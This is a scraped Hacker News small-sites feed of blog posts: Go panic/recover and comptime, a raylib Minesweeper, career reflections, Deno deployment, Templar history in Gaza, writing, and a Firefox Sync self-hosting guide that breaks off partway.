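    type parser struct{ /* tokens, position, etc. */ }

    func (p *parser) expect(ok bool) {
      if !ok {
        panic(errSyntax) // may fire many recursive calls deep
      }
    }

    func Parse(src string) (err error) {
      defer func() {
        if r := recover(); r != nil {
          e, isErr := r.(error)
          if !isErr || !errors.Is(e, errSyntax) {
            panic(r) // unknown panic value: a genuine bug, so let it crash
          }
          err = e // anticipated failure: surface it as a plain error
        }
      }()
      p := &parser{}
      p.expect(len(src) > 0) // toy check standing in for real parsing
      return nil
    }

    Note that the deferred function re-panics on anything other than the sentinel; that restraint is precisely what guards against the masking problem described next.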


    Panics should not be recovered too indiscriminately, though; a bug that triggers a panic will remain masked if a call to recover inadvertently swallows that panic:

    func ClimbAllPanic(mountains []Mountain) {
      defer func() {
        recover()
      }()
      for i := 0; ; i++ {
        mountains[i-1].Climb() // off-by-one error
      }
    }
    

    (playground)

    See issue 23012 for an example of such a problem in package encoding/json.


    But another, more surprising motivation for such a style is… performance! For instance, Max Hoffman and Raphael Poss separately report impressive speedups (on the happy path of their programmes, at least) thanks to this style. Explanations range from a decreased need for intermediate function results to code that is comparatively friendlier to the CPU’s branch predictor. So it seems that panic and recover can be beneficial to performance in at least some situations.

    Should you try to emulate this style? Up to you. If you go down that road, though, do justify your design decision with a clarifying comment and perhaps some benchmark results; if you cannot provide such justification, you’re perhaps being too clever. Also, make sure to keep this design decision as an implementation detail of your package; don’t let panics that should remain internal leak through your package’s API, as your clients would then regrettably be forced to deal with them.

    Acknowledgements

    Thanks to the members of the Gophers Slack workspace who lurk in the #performance channel for an enlightening discussion, which fed into this post.

    ]]>
    https://jub0bs.com/posts/2025-02-28-cost-of-panic-recover/ hacker-news-small-sites-43217209 Sat, 01 Mar 2025 08:19:11 GMT
    <![CDATA[Minesweeper in Go]]> thread link) | @pltvss
    February 28, 2025 | https://pliutau.com/minesweeper-in-golang-raylib/ | archive.org

    📅 Fri, Feb 28, 2025 ⏱️ 4-minute read

    I remember when I was in school and didn’t yet have a PC at home (probably around the year 2000); I would visit my Mom’s office to play some videogames on her work PC :) It was some Pentium and didn’t have many games in the beginning, but Minesweeper was always there, as it came with the Windows installation. Great times btw!

    Minesweeper

    I’ve never been a game developer and know little about it, beyond some simple 2D games in the terminal or browser. So tools like Unity don’t inspire me; they’re too big. But what about Raylib? It’s a (relatively) small C library for videogame programming that I find quite fun to work with.

    And it has bindings in many languages if you don’t want to work with C directly. For Go there is raylib-go, which exposes the Raylib bindings. It also comes with bindings for raygui. That should be more than enough to build the Minesweeper game and have some fun.

    On MacOS there is nothing extra that needs to be installed; just the latest Go, and we can get going.

    go get -v -u github.com/gen2brain/raylib-go/raylib
    go get -v -u github.com/gen2brain/raylib-go/raygui
    

    We can then use raygui to draw common elements like buttons, sliders, and text, and raylib for collision detection (though there is not much of that in Minesweeper). We could also use images as assets to draw mines and UI elements, but I decided to have a first version without that. Funny enough, I had almost forgotten the rules, but it took just a few minutes to be back in the 2000s.

    Each game has a state; ours can be as simple as:

    type state struct {
        menu      bool // is menu open
        gameOver  bool
        gameWon   bool
        startedAt time.Time // simple metrics
        rows      int32
        cols      int32
        mines     int32
        field     [][]point // initial state will be generated
    }
    
    type point struct {
        hasMine    bool
        open       bool
        marked     bool
        neighbours int
    }
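
    As a side note (this helper is mine, not from the post), the neighbours field is the classic “how many of the eight surrounding cells contain a mine” counter, which is typically filled in once, right after mine placement:

    // countNeighbours computes point.neighbours for every cell by scanning
    // the up-to-eight surrounding cells and counting mines. It assumes field
    // has already had its mines placed.
    func countNeighbours(field [][]point) {
      for x := range field {
        for y := range field[x] {
          n := 0
          for dx := -1; dx <= 1; dx++ {
            for dy := -1; dy <= 1; dy++ {
              if dx == 0 && dy == 0 {
                continue // skip the cell itself
              }
              nx, ny := x+dx, y+dy
              if nx >= 0 && nx < len(field) && ny >= 0 && ny < len(field[nx]) && field[nx][ny].hasMine {
                n++
              }
            }
          }
          field[x][y].neighbours = n
        }
      }
    }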
    

    When we open the game for the first time, we see the menu for selecting the difficulty, which has some presets of rows and columns as well as sliders. There we use raygui for these UI elements, and raylib to configure the app window itself.

    package main
    
    import (
        gui "github.com/gen2brain/raylib-go/raygui"
        rl "github.com/gen2brain/raylib-go/raylib"
    )
    
    func (s *state) drawMenu() {
        // set window size and center it
        rl.SetWindowSize(w, h)
        rl.SetWindowPosition((rl.GetMonitorWidth(0)-int(w))/2, (rl.GetMonitorHeight(0)-int(h))/2)
    
        // raygui.Button can be used with a callback function quite nicely!
        if clicked := gui.Button(rl.NewRectangle(padding, rowh, buttonWidth, size), "BEGINNER"); clicked {
            s.rows = 9
            s.cols = 9
            s.mines = 10
        }
    
    
        // ...
    }
    

    You play Minesweeper with a mouse (not sure how Vim users do that), so you need to detect left and right clicks. The left click is handled via the raygui.Button call above; for the right click we can use raylib’s main API:

    // Mark on right mouse button
    if rl.IsMouseButtonPressed(rl.MouseButtonRight) {
        if rl.CheckCollisionPointRec(rl.GetMousePosition(), rect) {
            if !s.field[x][y].open {
                s.field[x][y].marked = !s.field[x][y].marked
            }
        }
    }
    

    There is more code obviously (not that much, 300 lines in total), and you can find it on my GitHub.

    You can build it using Go’s standard build toolchain and play right away.

    In probably one hour of this “recreational” programming I was able to play my Minesweeper, and it worked really well. Yes, some visuals were missing, but the gameplay felt exactly as it did in the 2000s. My wife enjoyed it the most; she played for a few hours straight :)

    Raylib kept its promise: it was fun and easy to work with. I will definitely try something else with it, probably from Zig.

    Some resources

    Have you built anything with raylib and/or raylib-go?

    ]]>
    https://pliutau.com/minesweeper-in-golang-raylib/ hacker-news-small-sites-43216855 Sat, 01 Mar 2025 07:28:48 GMT
    <![CDATA[Aztec C Museum Website]]> thread link) | @atan2
    February 28, 2025 | https://www.aztecmuseum.ca/intro.htm | archive.org

    Unable to extract article]]>
    https://www.aztecmuseum.ca/intro.htm hacker-news-small-sites-43216744 Sat, 01 Mar 2025 07:10:58 GMT
    <![CDATA[How I didn't deal with professional heartbreak]]> thread link) | @hunglee2
    February 28, 2025 | https://rossclennett.com/2025/02/how-i-didnt-deal-with-professional-heartbreak/ | archive.org

    On the last day of June 2001 I left a company that had consumed my professional life.

    After over a decade of hard work, success and fun, it was all over.

    Events at the company had taken an unexpected turn in the previous twelve months and the bright future I envisaged was no more.

    Although I resigned, it wasn’t what I wanted.

    As a senior leader, when you no longer have the confidence of the managing director, you have no future there.

    My departure was unnecessarily drawn out and messy, which added to the pain I was already experiencing.

    Thankfully, my fantastic team gave me an unofficial company farewell, showing their appreciation for my contribution and sadness at my departure.

    I moved from Sydney to Melbourne the day immediately after my last day at work and started a new job the following month.

    My former employer’s culture and financial performance ebbed away, then it was bought by a larger company that retired the brand within a few short years.

    It was only this week, when reading the Harvard Business Review, that I found a full and accurate description of the emotional turmoil I experienced all those years ago.

    The article by senior editor Gretchen Gavett discusses “professional heartbreak” described by author and host of The Anxious Achiever podcast Morra Aarons-Mele as, “….the loss of something work-related that feels as personally wounding as grief or heartbreak in your personal life. This can be because something happened that’s so deeply counter to your values system that you feel morally wounded. It can be the loss of something that you loved, like your business or a long tenure at a company, or a loss of a professional identity you’ve worked for many years to build. It can be a betrayal from a colleague, boss, or client you thought you knew. Regardless of the circumstances, professional heartbreak brings up all the big emotions.”

    Yes, yes, yes, yes, and yes.

    I felt grief.

    How it happened was counter to my values system and made me feel morally wounded.

    I had lost what I loved – my long-standing role in a company I was deeply committed to.

    I lost my professional identity.

    I felt betrayed by a person I thought I knew.

    As Morra Aarons-Mele says, “….professional heartbreak often stems from a fundamental clash between your personal values and those of your employer… (and) strikes deepest when our sense of self becomes inseparable from our work.”

    My sense of self was thoroughly intertwined with my work. The professional identity I had invested twelve years in building was gone (in my eyes, at least) because I refused to adjust my personal values to fit with those of my new boss.

    In mid-2023, former colleagues organised a reunion. Although it required flying to Sydney, I had nothing preventing me from attending. The reunion invitation even featured a photo of the three co-founders I took at the company’s five-year anniversary party.

    I didn’t go.

    Maybe I was still feeling a mixture of anger, shame and embarrassment about how my tenure ended (although nobody attending the reunion played a role in my departure).

    The following week, I was sent the ‘remember when’ slide pack, which was shown at the reunion, and the photos taken that night.

    Looking through the slide pack and photos, I immediately regretted not attending.

    As I looked at all the familiar faces, from then and now, I remembered all the great people I worked for and with, and how much success and fun we had together.

    I needed to get over myself.

    The final piece of the emotional puzzle is finally having a label to describe my experience that I can identify with and embrace.

    Nearly twenty-four years ago, I went through tremendous professional heartbreak …and I am now over it.

    Related blogs

    The Good News About Being Fired

    The most emotionally intelligent leader I was lucky to work for

    More powerful lessons from The Rare Find: Think through the assignment

    ]]>
    https://rossclennett.com/2025/02/how-i-didnt-deal-with-professional-heartbreak/ hacker-news-small-sites-43216558 Sat, 01 Mar 2025 06:33:18 GMT
    <![CDATA[You Can't Delete the Default]]> thread link) | @smitec
    February 28, 2025 | https://www.elliotcsmith.com/you-cant-delete-the-default/ | archive.org

    Every company has a default. It’s the set of things that happen when nobody is pushing in any particular direction. Usually, it’s the combined momentum of all the pushing you’ve been doing. There are times in a company when it’s useful to remove that default. You want to break habits because the standard way is no longer the way things should happen. If you get to this point, you’ll need to remember: you can’t just delete a default.

    You can try to delete a default. You can lay down the law that whatever the old way was, it’s not the way any more. You can insist that things are different now and you need to be doing things a different way. This might work for a little while. People will likely avoid the old patterns, especially when you’re looking. What usually ends up happening, though, is that a new default forms. One that is a tiny step away from the old default, such that it technically complies with the decree.

    This behaviour can sound malicious on the surface. It isn’t. Defaults arise because people like patterns. People like to have systems that they can work within and work to improve. The defaults arise because they are the settled state of all the moving pieces in your business. When your company is small, say half a dozen people, you’re all talking a lot and can be very explicit about what the default is going to be. Any new idea or momentum easily spreads between everyone. Multiply your headcount by ten and the defaults often arise out of compromise. Compromise in all the little interconnections that nobody has explicitly set out to manage.

    If, as a manager or a founder, you see a default you don’t like, you need to find a way to replace it. Generally speaking, I would try to keep your focus on the big defaults. How do people talk about the company? What, broadly, would people say no to because it’s not a fit? Big, identity-level defaults that have a way of influencing all the others. These take deliberate focus and effort to change.

    Sometimes the new ‘default’ comes nicely wrapped in a brand new product. Maybe it’s a pivot or maybe it’s adding something to an existing platform or set of products. In this case, new defaults come fairly naturally. The best way to wrap them up is to treat the new thing like an experiment. If you have existing products and revenue you aren’t going to shift all your resources overnight. For every Slack-style ‘we were a games company and now we do chat’ there are hundreds of smaller shifts.

    This ‘new product, new default’ shift is one of the simpler ones to make. You slowly push the new product more and more and slowly replace old patterns with new ones. You probably need to prepare for this path to be a slow one. By its nature, your new thing is new. It’s little, it’s different and people will likely need time to adjust. Again, you can probably assume nobody is malicious, but people do get set in their ways.

    To put out a concrete, but somewhat redacted, example: I am currently working on a shift like this. I’ve been working to launch and grow a software platform within a startup that has a history more in line with tech-enabled services. The product is adjacent but different. How we sell, what we build and who it’s for all rhyme with our existing customers but are different enough that there’s a need to manage the shifting defaults.

    Having this product be somewhat stand-alone has let us launch without tearing down everything that was there before. We’ve now got enough customers on board that we can start the process of turning what was initially an experiment into a set of new defaults.

    If the idea of slowly shifting defaults makes you feel frustrated and impatient then the other option is a big-bang shift in identity. You might call it a pivot, you might call it a rebrand. There are plenty of names for the process of tearing things back and laying down something new.

    This method is quicker. It is also riskier and requires a lot more focused effort. If you mess up a shift like this you risk losing all that was good about the old way and gaining none of the good from what’s new. There is also a very real possibility that you’ll fall into the trap of so many large companies and run an ‘internal rebrand’ that makes no difference to anyone except a small focus group who orchestrated the whole thing.

    Real systematic change requires that everyone buys into the new world order. People either need to follow along blindly (the less appealing option) or understand deeply why the defaults and fabric of the business are shifting.

    I have seen this kind of change work. Other than the survivorship-bias-laden stories from Silicon Valley, these kinds of changes often pop up after hiring new senior leaders or finding new investors. That injection of ‘new’ can be enough of a catalyst to make these big changes possible. People, broadly speaking, have a fairly low tolerance for change for the sake of change. If they feel that’s what’s going on, they’ll get frustrated.

    Tie it to the narrative of new leaders or new investment and you’ll have an easier time bringing people with you. This applies to both internal and external perceptions. Really doing this well requires a shift in both. If you position yourself to customers as one thing and then deliver another, you’ll lose customers. If you position yourself to staff as one thing and sell another you’ll lose staff.

    So much of keeping a startup alive and growing is setting the right expectations and delivering on them. As you grow, more and more of that delivery comes from your defaults. They exist out of necessity because people like to come to work and know they’re picking up from yesterday. You can change the defaults, but whether it’s the slow burn of a new stealth product launch or the flash fire of reinventing yourself, you need to remember: defaults get replaced, they don’t get deleted.

    ]]>
    https://www.elliotcsmith.com/you-cant-delete-the-default/ hacker-news-small-sites-43216197 Sat, 01 Mar 2025 05:13:21 GMT
    <![CDATA[Who Did the Work?]]> thread link) | @surprisetalk
    February 28, 2025 | https://quarter--mile.com/Who-Did-The-Work | archive.org

    Unable to extract article]]>
    https://quarter--mile.com/Who-Did-The-Work hacker-news-small-sites-43215869 Sat, 01 Mar 2025 04:24:20 GMT
    <![CDATA[Deno shows us there's a better way]]> thread link) | @todsacerdoti
    February 28, 2025 | https://www.macchaffee.com/blog/2025/deno/ | archive.org

    Recently, I completed a full rewrite of my first personal project, which was a Django project running on Heroku. Now it's a Deno project running on Deno Deploy. The experience has really gotten me thinking about the amount of pain we put up with to deploy simple stuff these days, especially with containers. Deno shows us that it doesn't have to be that way.

    I know what you're thinking, "we already had a great setup: rsyncing PHP files". Unfortunately, rsyncing PHP files still lacks many critical features needed for more complicated projects. Collaboration, continuous integration, dependency management, multi-region support, scalability, preview environments, runtime security are just some of the features you'd have to build yourself. That's part of why containerization (and its ecosystem) has taken off, since it provides a well-trodden path for each of those features ("just a few more CNCF projects and we can really get this thing poppin'")

    But people have been saying for a long time that containers are painful to work with. Historically I've been a bit dismissive of those people because, like all technology, containers make tradeoffs. You have to tolerate the slow build times, bloated images, and YAML hell in order to get the language agnosticism, dependency bundling, immutability, and access to Kubernetes and other projects that give your app superpowers as long as it's containerized. At least, that's what I used to believe.

    Deno seems to take a holistic approach, where the development environment, deployment method, and infrastructure are all self-contained within the deno CLI. Maybe some of this comes from Golang's decision to bundle the package manager and the formatter/linter directly into the language, which Deno does as well.

    I think this is a smart move. The more mature platforms I see have more tight integration with the application code itself. Normally this is a set of config files (terraform or k8s manifests), but there have been efforts to replace config files with full languages such as Pulumi. Even before that, there were libraries like Netflix's Hystrix which baked a service mesh into application code (before service meshes even existed). I think these threads of history tie into Deno's all-in-one approach to produce a nice developer experience with just a git repo and a CLI tool.

    The rewrite

    The Django project that I rewrote in Deno is your typical 3-tier web app. I'd classify it as a non-trivial application that took me maybe 30 eight-hour working days to build originally (which translates to years of weekend coding). I was able to rewrite it in a week of evenings, about 4 work days. And this was my first experience writing TypeScript/Deno, so I had to look up a bunch of simple questions like how to do loops or create maps!

    • The development environment setup is easy, just a curl | bash to get the Deno CLI. The language server can be installed easily into Zed or VS Code. No messing around with JDKs or system Python versions.
    • Packages are cached globally but tracked/locked in your git repo, so no giant node_modules folder and no Python virtual environments.
    • Everything you need to develop—including data storage via Deno KV—is included in the CLI, so no need for Docker.
    • Package install times are so fast that I wasn't bothered by the fact that Deno's caching/vendoring was broken when I tried to set up Gitlab CI.
    • Compile/run/test times seem nearly instantaneous (it is a small project with only a single dependency), so I was able to run tests as a pre-commit hook without even noticing a delay.
    • Deployment to multiple regions with a highly available database only takes a single command which runs several times quicker than the Heroku deployments I was doing before.
    • Deno has capabilities-based security, where it doesn't get the ability to spawn arbitrary processes, read environment variables, or read/write any file in your home folder.

    The beautiful thing is that (no offense) I don't think any of these are revolutionary ideas on their own. I don't even think it'd be too hard to add these features to existing languages. Just seems like nobody else seems keen on bringing all of these elements together.

    There were some rough edges, and I know Deno has a lot of beta-quality things, but they've been in beta for a while. The metrics and logs are lacking, I had some issues with the API docs, some error messages were unclear, you can't simply download a backup of your KV data, and I hit the classic React issue where some content refers to old Deno features/techniques that don't exist anymore. One big gap: I can't imagine running a Deno Deploy site without a caching/rate-limiting CDN in front to control costs, which is such an easy feature Deno could include. Without that, it kinda defeats the whole purpose of running at the edge.

    Conclusion

    Computers are so ridiculously powerful these days that it's so weird we still have CI/CD pipelines that take tens of minutes. SQLite runs 300k test cases in "only a few minutes" on every commit. We also have huge servers with huge disks where you could store the top 99% of every library, package, binary, etc., completely eliminating the need for CI/CD caching. We have advanced compilers that can do incremental compilation. We have an enormous pool of seasoned software engineers who could bring all these things together, and an enormous tech industry itching to pay for it. Maybe if everyone wasn't busy building ad tech and chat bots, we'd get somewhere.

    ]]>
    https://www.macchaffee.com/blog/2025/deno/ hacker-news-small-sites-43215809 Sat, 01 Mar 2025 04:14:56 GMT
    <![CDATA[The Knights Templar in Gaza]]> thread link) | @vinnyglennon
    February 28, 2025 | https://thetemplarknight.com/2024/01/14/the-knights-templar-in-gaza/ | archive.org

    Gaza is in the news right now as Israel and Hamas clash in this relatively small piece of territory that is nevertheless densely populated. A little known fact about Gaza is that it was a stronghold of the Knights Templar during the Crusades.

    The city fell to the crusaders in 1100, just a year after Jerusalem had been taken. It was of huge strategic importance being so close to the enemy Fatimid empire, a Shia Muslim realm centred on Egypt. Around 1149, the Knights Templar were tasked with holding the city. Taking Gaza allowed the Kingdom of Jerusalem to encircle nearby Ascalon, which was still under Fatimid control. With Gaza transformed into a Templar stronghold, the supply routes from Egypt to Ascalon were disrupted.

    In 1153, Ascalon fell to the crusaders after a victorious siege in which the Templars played a major role. A year later, in 1154, the Muslim chronicler Abu Abdullah Muhammad al-Idrisi conceded that under Templar control, Gaza was thriving and its once severely reduced population had recovered, benefiting from being located on a key trading route. Indeed as Gaza grew, people were encouraged to build homes outside the city wall under Templar protection.

    Promoting Christianity was at the centre of the Templar mission. In 1149, a large church was built in the city on top of the ruins of what had been a 6th century Byzantine Christian church then transformed into a mosque, after Muslim armies invaded in the 7th century, but subsequently badly damaged by an earthquake in 1033 that sent the minaret crashing down on to the building.

    Going back further in history, like so many churches, the site had originally been a pagan temple. But not just any old pagan temple. This was the Philistine temple to the god Dagon famously toppled by Samson in the bible. The building reverted to being a mosque after the Templars gave up Gaza but traces of the crusader church were still very visible for centuries. However, much of the mosque and its medieval Christian remains were destroyed in an Israeli air strike in December 2023.

    In 1170, the Templars completed the construction of a fortress in Gaza. But in that same year, the Saracen leader Saladin – who had unified Egypt and Syria and now posed a huge threat to the crusaders – attacked Gaza. Many of the Templars were not present, having been ordered to help King Amalric of Jerusalem defend another nearby town. Gaza was left under the control of a cousin of the king, Miles de Plancy. The medieval chronicler William of Tyre described De Plancy as a degenerate drunk unfit to hold such an important position.

    Faced by this surprise assault from Saladin, and with few Templars around to defend the city, De Plancy raised the drawbridge, preventing defenceless inhabitants entering the fortress, which led to their slaughter by Saladin’s soldiers. It seems that De Plancy’s view was that these untrained people should do their best to fight the invaders while he watched from the battlements. What he witnessed was a horrific bloodbath. However, Saladin did not take Gaza that day.

    Emboldened, Saladin amassed a huge army and began ravaging the countryside around Gaza and Ascalon in 1177. His troops fanned out over the area becoming a little lax in terms of discipline. Reportedly, there were tens of thousands of Saracens looting and taking supplies all within crusader territory. King Baldwin IV of Jerusalem, the teenage monarch who famously suffered from leprosy, decided to strike back. Together with the Templars he inflicted a stunning defeat on Saladin at the Battle of Montgisard, sending the Muslim leader fleeing back to Egypt – defeated despite his overwhelming superiority in terms of troop numbers.

    This was the high point for the Templars in the Holy Land where they evidenced the effectiveness of their battle tactics and incredible discipline, moulded by their spiritual ethos. But – pride comes before a fall. And Saladin learned his lessons well. By 1187, the Templar grand master was the mercurial Gerard de Ridefort who spent a great deal of time immersed in the turbulent court politics of the kingdom of Jerusalem. On July 4 of that year, he led his Templar army to a terrible defeat at the Battle of Hattin, largely because he refused to take advice from crusaders he disliked for political and personal reasons.

    De Ridefort was taken prisoner by Saladin but the Templars negotiated his release in return for surrendering Gaza. Not long after, Saladin made a point of destroying Gaza’s fortifications. The city was retaken in a subsequent crusade by Richard the Lionheart but then went back to Muslim rule before being completely flattened by a Mongol army under Hulagu Khan in the 13th century.

    ]]>
    https://thetemplarknight.com/2024/01/14/the-knights-templar-in-gaza/ hacker-news-small-sites-43215277 Sat, 01 Mar 2025 03:01:22 GMT
    <![CDATA[Some people have it, some people don't?]]> thread link) | @herbertl
    February 28, 2025 | https://herbertlui.net/some-people-have-it-some-people-dont/ | archive.org

    A few years ago, I wrote that writing is thinking. You are better off writing to think, not trying to think before you write.

    “But some people are just better at it,” Ant K writes in a comment (which Karolis recently agreed with). He compared his work with another author he held in high esteem. “He has it. I don’t.” 

    While there are different people with different talents when it comes to writing, it just doesn’t really matter.

    Or, rather, it matters as much as you think it matters.

    I used to think I didn’t have interesting life experiences to write about. While my grandparents and parents had all of the adventures (including immigrating from Hong Kong to Canada), I grew up in the suburbs in Canada. There were literally hundreds of thousands of kids who did the same thing. What could I possibly have to write about that people would consider interesting?

    While an occasional English teacher would praise my skills, I had slightly above average writing skills at best. Certainly not comparable to the authors I held in high esteem, or anything that I thought would be worth pitching a traditional media publication.

    These beliefs didn’t make me feel better, and they didn’t encourage me to write. After a long time—too long—I chose to see the world differently. You could say all of Creative Doing was me working through this belief and rewiring my brain. After I made that decision, I realized that I had a lot to offer. I have to keep practicing this decision by writing in my journal. I often turn to Byron Katie’s framework, The Work. Derek Sivers also wrote some great questions for reframing.

    It was as if my brain started accepting that I had a story to tell, and actually remembered these life experiences. How I grew up in church six days a week. How existential philosophy changed my life. How technology shaped my life. How I experienced my first kiss one random Saturday night. How lost I felt in business school. How determined I was to become a writer—even when I believed that I didn’t matter—that I started my professional writing career by writing for dollars per post. And so much more… (I’m writing some of these stories for my next book right now!)

    If “Some people have it, some don’t,” encourages you to practice—then by all means, believe it. But if that narrative does not encourage you to practice, then you would benefit from choosing a more energizing, liberating, belief. You may be surprised at how your brain rises to the occasion.

    While my original response to Ant was to focus more on the intrinsic rewards of writing, and not to compare his work to someone else’s, I’d certainly make the case now that when you write and publish, you are adding another option to the world—which makes it better.

    Even if you don’t think your work holds a candle to the author you admire, someone may be able to relate to your work in a way that they can’t to anyone else’s. They had to hear you say it your way. If it changes even one person’s life slightly, it would have been worth it.

    It’s not about what you have, it’s about what you give. And in order to give more of yourself, you will need to accept yourself. What’s definitely true is you have something—everybody does. It’s up to you to decide whether you are willing to share it or not.

    ]]>
    https://herbertlui.net/some-people-have-it-some-people-dont/ hacker-news-small-sites-43214973 Sat, 01 Mar 2025 02:25:02 GMT
    <![CDATA[Magic isn't real]]> thread link) | @SchwKatze
    February 28, 2025 | https://pthorpe92.dev/magic/ | archive.org

    Any sufficiently advanced technology is indistinguishable from magic.

    • Arthur C. Clarke

    This quote applies just as much to developers as it does to non-tech people, sometimes more. I remember, towards the beginning of my programming journey (both the first time I learned 18+ years ago, and again ~15 years later), the feeling at the root of what they call tutorial hell (I personally loathe tutorials, and always chose instead to try to build things myself; I attribute a great deal of the relative success I have achieved to this).

    The situation:

    You feel like you understand perfectly how to properly swing a hammer, lay brick, frame drywall, and you learned the right way to measure and cut beams with a saw, yet you still look at buildings and architecture and stand completely baffled that those tools you have learned were the same ones used to build these great structures. With no idea where to start, you stare at your tools, supplies and materials wondering if they must have some kind of special equipment or secret freemason knowledge that you don't have access to. You don't know how someone ended up with that result, using the same tools you see in front of you, and you definitely cannot imagine cutting the first board or laying the first brick.

    Many know that this is the exact feeling of learning how to program, and fully grasping the concepts of loops, variables, data structures, trees, stacks, linked-lists, arrays, control flow, etc, etc, etc... then looking at a compiler, a video game, an operating system, a web browser and thinking yeah right.... Those devs must all have started programming C and x86 assembly while they were in diapers, and all attended Stanford where they were taught secret knowledge passed down from Ken Thompson, by Brian Kernighan himself.

    Assuming you don't take the strict path of the JS frameworker vercel user: eventually after enough time, you start to recognize patterns. You 'go to definition' on enough methods from libraries you use to see how they are implemented and you build enough side projects and watch enough 'tsoding daily', 'sphaerophoria', and 'awesomekling' to begin to demystify at least how things like web/network protocols, or image/video encodings, syscalls/file IO operations work at some level. You no longer would feel completely lost if you had to write a shell or a lisp interpreter: you would at the very least know that to begin, you would probably have to read the source file into memory and break it up into tokens before trying to parse it to build the syntax tree needed so you can traverse and analyze it before stepping through it to execute the code. Previously, what now feels so obvious to you, would have seemed some kind of sorcery reserved only for the aforementioned programming elite.

    I'm sure I'm not alone, in that each time you pull the curtain off a piece of 'magic', you have the same thought:

    Oooooh yeah. I mean, well duh.. how else would you do that? I can't believe I couldn't see it.

    As time goes on, there are fewer and fewer things I run into where I cannot mentally parse, at least from a very broad and high level, what an implementation might look like. Now I definitely don't claim to know how kernel internals, 3d rendering, or GPU drivers work, but what I mean is most things have lost the shadowy mystique, and feel more like something I can get excited to learn about, rather than scary forbidden knowledge I will never be allowed to possess. Although for those things, that may as well be the case ;)

    The other day, after a long day's work synchronizing different environments/k8s clusters, I decided to browse HN as I normally do at that time. I ran into a post referencing comptime for Go, which linked to a GitHub repo. It immediately caught my attention: although I have not written Zig myself, Andrew Kelley is one of my programming idols and I definitely follow Zig's development. Comptime is one of Zig's most envied language features, and although it is achievable via metaprogramming or constexpr in other languages, Zig's straightforward procedural approach/API makes it particularly admired.

    This was when I came upon that familiar feeling:

    How tf

    Confused..

    ^^^^^^ Me if you had told me I had to implement comptime in go without touching the compiler

    So I decided that I had to know how this was done, and I had a few hours to spare so I decided I would maybe try to contribute, or at least add some kind of feature of any level of value, just to force myself to understand what was going on here.

    Then after a brief peruse through the code...

    Turns out, you can pass a flag at build time in Go called -toolexec, which allows you to invoke toolchain programs; in this case, the prep binary, which is called with the absolute path of the program. By combining another one of the author's packages, goinject, with the yaegi (Yet Another Elegant Go Interpreter) library, you get the AST, a file decorator, and an import restorer by implementing Modifier. That lets you collect the variables from the relevant function in the tree, output each of them to a temporary file, and run the interpreter on it, giving you the computed result of foo in prep.Comptime(foo()), which you then use to replace the values in the DST during the Modify pass. Voilà: you have achieved compile-time computation.

    Oh, well yeah. That makes perfect sense. I mean how else did I think it was gonna work?
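
    For concreteness, here is a minimal sketch of the usage pattern described above. The import path is a placeholder of my own (the post names only the prep binary and the prep.Comptime call), and the exact CLI invocation may differ:

    package main

    import (
      "fmt"

      "example.com/prep" // placeholder import path; substitute the real module path
    )

    // fib is an ordinary, deliberately expensive Go function; nothing about it
    // is marked as compile-time-only.
    func fib(n int) int {
      if n < 2 {
        return n
      }
      return fib(n-1) + fib(n-2)
    }

    func main() {
      // When built with -toolexec pointing at the prep binary, this call site
      // is rewritten with the value obtained by interpreting fib(35), so the
      // compiled binary simply prints a precomputed constant.
      fmt.Println(prep.Comptime(fib(35)))
    }

    The rewrite is triggered by building with something along the lines of go build -toolexec="prep" ., since -toolexec makes the go tool route each toolchain invocation through the given program.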

    After a couple hours, I had added variable scoping, and global const declarations, which I concluded was actually not a useful feature at all, because each function is evaluated on its own, leaving essentially a 0% chance of actual naming/scope conflicts. But the point is, I didn't discover that until I had finished writing it with some tests, and although the 'feature' is useless, the whole process was a very valuable learning experience and all around a good use of my time.

    This is just a reminder to everyone at different levels of their developer journey, that the "magic" is not real and the overwhelming majority of the time, you are simply lacking the necessary context and it will likely make perfect sense to you as soon as you have it.

    It's always worth your time to learn parts of the stack that you might not work in daily. As you build your fundamental understanding, it demystifies other pieces of the puzzle that you would never would have put together otherwise. Even if it doesn't feel important now, I guarantee the knowledge pays off at some point in the future.

    Keep learning every day, strive for deeper understanding, and spend time building or hacking on even things that are considered 'solved problems'. Even if you are only paid to write React, it is very much of value to you and your career to understand how the internals work, or how your one-click 'serverless' auto-scaling deployments work...

    (hint: servers)

    ]]>
    https://pthorpe92.dev/magic/ hacker-news-small-sites-43214353 Sat, 01 Mar 2025 01:09:22 GMT
    <![CDATA[Self-Hosting a Firefox Sync Server]]> thread link) | @shantara
    February 28, 2025 | https://blog.diego.dev/posts/firefox-sync-server/ | archive.org

    After switching from Firefox to LibreWolf, I became interested in the idea of self-hosting my own Firefox Sync server. Although I had seen this was possible before, I had never really looked into it—until now. I embarked on a journey to set this up, and while it wasn’t completely smooth sailing, I eventually got it working. Here’s how it went.

    Finding the Right Sync Server

    Initial Search: Mozilla’s Sync Server Repo

    I started by searching for “firefox sync server github” and quickly found Mozilla’s syncserver repo. This is an all-in-one package designed for self-hosting a Firefox Sync server. It bundles both the tokenserver for authentication and syncstorage for storage, which sounded like exactly what I needed.

    However, there were two red flags:

    1. The repository had “failed” tags in the build history.
    2. A warning was prominently displayed stating that the repository was no longer being maintained and pointing to a new project in Rust.

    Switching to Rust: syncstorage-rs

    With that in mind, I followed the link to syncstorage-rs, which is a modern, Rust-based version of the original project. It seemed like the more viable option, so I decided to move forward with this one. But first, I wanted to check if there was a ready-to-go Docker image to make deployment easier. Unfortunately, there wasn’t one, but the documentation did mention running it with Docker.

    This is where things started to get complicated.

    Diving Into Docker: Confusion and Complexity

    Documentation Woes

    The Docker documentation had some strange parts. For example, it mentioned:

    • Ensuring that grpcio and protobuf versions matched the versions used by google-cloud-rust-raw. This sounded odd—shouldn’t Docker handle version dependencies automatically?
    • Another confusing part was the instruction to manually copy the contents of mozilla-rust-sdk into the top-level root directory. Again, why wasn’t this step automated in the Dockerfile?

    At this point, I was feeling a bit uneasy but decided to push forward. I reviewed the repo, the Dockerfile, the Makefile, and the circleci workflows. Despite all that, I was still unsure how to proceed.

    A Simpler Solution: syncstorage-rs-docker

    I then stumbled upon dan-r’s syncstorage-rs-docker repo, which had a much simpler Docker setup. The description explained that the author had also encountered issues with the original documentation and decided to create a Docker container for their own infrastructure.

    At this point, I felt reassured that I wasn’t alone in my confusion, and decided to give this setup a try.

    Setting Up the Server: Docker Compose and MariaDB

    Docker Compose Setup

    I copied the following services into my docker-compose.yaml:

      firefox_mariadb:
        container_name: firefox_mariadb
        image: linuxserver/mariadb:10.6.13
        volumes:
          - /data/ffsync/dbdata:/config
        restart: unless-stopped
        environment:
          MYSQL_DATABASE: syncstorage
          MYSQL_USER: sync
          MYSQL_PASSWORD: syncpass
